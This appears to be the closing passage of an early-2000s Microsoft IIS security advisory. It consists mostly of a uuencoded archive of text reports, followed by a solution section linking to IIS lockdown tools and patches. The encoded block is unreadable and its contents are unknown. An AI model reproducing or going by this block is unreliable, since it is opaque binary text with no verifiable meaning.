M1&S]7'_M=H[^GU^F5W)=+A8RI\YW\WJ[`VCK'8IEO(T@]X&JM8RH7<N=N345
MPRB0.)-6SCU3-'R1$39PTXT\]6N6FP#6MD]DNK)XJEC0BH8^E4'FQ2+98W_?
M^WA%(<D?#?P^745N4O=<ZR(UY?",1+WIK5Y\AK#Q\*#7?Q(.+`L;Y1Q,3P..
M/UQ?B)O3=V<?+B\N?_N'>'?9]RYN3OI8MA+SL9#<4<@62S+[1])A>YG*5"<D
MH>UU<K;94-7N$Z]WO]^(L].KT]UOO+H=:F^V6J^VW+-KT=:Y$L\9K+A!R4"H
M<!Y)VZW;=^":MM=_F.+!8US'?5]XIK;B_D^(V9]0&5`G].8,`SY>7?YV=?Q>
M?#J_N!"7'R[^`2RO;S"JQI;R=I9D=VN'[;-@=3M?U5_QS^U+K_<(K/^(4PK6
M2O1T$<KHH3_O-2[^B(MQUI__M'$MB6>/+N:TEVA?M&9EKBYS>;>0+@*(;=#P
M>I_T\,O^T#S*HIR#I)!NTP>9WP4>1?+\-7V^__,SQORSV]F*HVVZ)[X[$B-<
MVJ)K6YRPHNW>*P2O)5)T3OO>)97V@'=^F]ZF/8^H=#M_^I]WWC:G;,5(#9@W
M&$[Z/OX-8'-3O]T&=]/KR66A,15E'K+WPM2/CR#NT5@:G2ML]E/AT]1_\:63
M3Y=7)T+G`77=COP'?Z"&T6P0[([>[NWAJS\:3T:3T=LMFKZW5[4$4'>>G5Y<
MO+L\.:VH=#M_P5\PXLA-/#14)A,UBWS[!2L<1($*\*5W^S`(;A^BV>V#.NAV
M;G&OA\MTW:^NFZO,K%%""-L^_WC$,`P^OVU=_Q5`FSO[?(<4N%(STL.1++)X
MF^\-#7AF&C@^PH)!T'SWA.A1MY]^@X&A>S.30[I*3P)Z;[>V")7!@7NF!*J?
MKH^I[;:UTK3&]>6[OY_>;/'G)$.$`GS84AVQ"F!!&'U-RBV7VP2-/_"^7^D=
MLBF_MBG6<6/DCFF6]XP)6*7N#FJMFK[.ELZ"KZ2/+['I_M$`^MU'QOX2R46<
MK(^.?_UR_N'TIG6+X9H72)K;%KR=UGWS@7\=(:04_&G;Z(5'ZB-:6A7;EKI'
M,'RYOKDZ/7[O^3M6=GUTM#O8D/*:YXD`-0(VJB^)N66(V%)C6WO;1FKAI!:O
M=[ZGWYZ._UME<%9\WMD1%*+%HW7?R91BH*7FRO&Z\8F(AMWN\XB3+6&[$T5_
MCOS#`[(]8UT:]7M"68D3`FQI/+Y]F))AP\[V]V%K_NW##.^(WI/;AW`*"\-U
MY9MQ$8\CNPL.<>6PQU2FX>W#D%PDJM\SS#S`C`.L,(&U'JC;!SFSU\=$X<"N
MB3C'5.CN_M#P(*49.0$/$XPY`,6#_0:%F9M+E(9,VU`916TJQ-L$[ZEO9Q(U
M?#\8N7F."LT81987N_YPW\Q4$\,+43O$>^"WI1TS)O0I]&M<1F.#V(N4#I^G
M9-$]M)1`909N1WB/#VI*!^!U-#%S)HQL9'41[F_P,K*CIV[TYE@[SC?H1AP&
M#[#63!DJ@]#$'EK_)0ID3P<\>P:,]Y6;9:B\.'/J5L2<R%C?^,!A8F;55%HS
M1_5,0M8?-/E\#I<I9NZ/VCIP5(+1IK0O41E.VU2:_D3:'OO_#I7!!A72%WE`
M)?UT4W*B1OYY(*V.)B^-QN?`4"7)ZG&5U>VWK8XB0%,27QG[J:5IKD)4S$Q#
M);061[IXD2??C!OLMS0]?5K3@95@X'\+EV!:X^*_@.*41P\V8IB+'=*OHQ19
M&>,P-'9"\8/MA2(E[HTG]76#&U&F;QQ/_3K6T;N*3L%CE"-E^#>_'14SJJ8R
M\FM*A`W-'OLUM8JW@?4(WR$\MCI2C=%CO]97TT;&UFXJ#8PX,K`.ZAQ`=Z3?
MMHU@U*`PW;0&UA&/Z%7YB&RFR<^SU/R6IEF*VE[&DYHG0G?LU]\/IQO?@Z=P
MB2P?WZ3F-[\3E4.R`[_!BXV]Y/,T:H;W_E/1`M+,@,V(T359S%+9K[/9L[,?
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MT]VN-UF\`1OXP]'K*6__MQ9JH;$-;0WP?*C-;@J[G?:]G1TW+5BNM[]O$[;[
MR/8$R(M])V2MK^_L#CY[U3?OT6VSQK]#>_!9''&WIMYC4EN[%G/`6\U*3'O/
M\SU[US9^M.TQ50-ZK_0K_;=7NF4(K[0Y3?D*(IGOK_3`-Y_H_Q']=XQ7]>47
MO/@^9O0\/?!<#\9K(ZZ'GND.>'KDZ;&WE.'>:\]VG;R_NAW3-WJ]Y^E@QXE+
MO1MB&.`=.0PM_S1&X/5ZVW2>7N]@`'X:`A)KO1W`9WM2!-,+PTDL'FZ9,KC9
M9@T-V]9>-=IR57<RS#C!C06QV='@YQ`.#M/2^.[Y1H)5I54C-1-XJ.4D5\$]
M.#%<&)-A/`PKMJUB9#-R_4B=]I]ZW%'Z\/O%1<6<GI=%F*V`J15C*T@RK6S?
M1KN.X0LRW-`!Q3L9I]\]WZ$AV]M<Z-$Z50?T-J4G8S\6*J$3]-0*Q>LG>RZJ
MV9<QW1AJAC::3H95^P@Q>+*?0[,\>CB;EZF@IU+FN"*U3INBD'$U6J7_>KJ3
M;U^G:?BM3C[]B8,,%ZI^/L.?.^/1'=4[$GMAJG*7E+C)!P0]$9G$:"O-$
M+5B$=+:M?YGR69WT[M$)AM@>]Z-'=6L^?4?@=#LD/TOO5N-S#.ZL;NL\N2S:
M([N=599_U7P\AL]/P1K=09M,\3G6A9*ITT)UM*DZNFIU4<B<;AF5\--FJ<UC
M/J9%9S^R!4W+@D":TTKF[!$S!PDK=G=GV0,E(H7PB&GW<0!)?Z#'2@4]P$TE
M9`ER!21))'/,D([4I.+XCVW*=O1\YP]WH':'3S/PLG0PKB_3-69YC$$8RR1K
MHLRVS$UW>&:\I),BPCZ#7L5:52"0+9)]V3..PD)!3UY%'%FE5`<+^(F=^;L*
M\^`9[D.'TQJ/ERH+L@]:0CND];1E#X9EU49VPL\4LZ2TY\H?D3('-)X]GN&X
MT'OV#W;(;O]6_?G.^<G1_F0Z'!ESM\>TF\O8=>J3"D/?'YA3"NY1$AV&2,05
MW=5\:"._YP=2UE'.6X_*7WS(U^U4C_G."_M'+:*@JD//8YA*V!>_P&SM&8"[
M4O+9!V4ME1[\T<D3=^J!GJ[S`TI/U+I=65-<EKDNW<S<\&YG)7+%W&\^!A-T
M,8'+S_E/9W[>N/<_4$L!`A8+%`````@`0VB++!@@]I0\!@``GPP```T`````
M`````0`@`("!`````')E<&]R=%\Q,"YT>'102P$"%@L4````"``F9XLLW$%K
M[N8!``!L`P``#``````````!`"``@(%G!@``<F5P;W)T7S8N='AT4$L!`A8+
M%`````@`&F>++`7?E=[W!P``K1,```P``````````0`@`("!=P@``')E<&]R
M=%\U+G1X=%!+`0(6"Q0````(`%IGBRS;F+>]W`,``,4'```,``````````$`
M(`"`@9@0``!R97!O<G1?."YT>'102P$"%@L4``(`"`"!4J8LLM^M-$<5``"K
M-0``#``````````!`"``@(&>%```<F5P;W)T7S$N='AT4$L%!@`````%``4`
*(P$```\J````````
`
end
11080 bytes
SOLUTION
Hint:
Although the following will not protect you from all vulnerabilities,
it can do no harm to help secure your server with:
http://www.microsoft.com/technet/security/tools/locktool.asp
http://www.microsoft.com/technet/security/URLScan.asp
Microsoft IIS 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37931
Microsoft IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37824
Microsoft IIS 5.1:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37857
Microsoft IIS 6.0:
Beta versions of .NET Server after Build 3605 contain fixes for IIS 6.0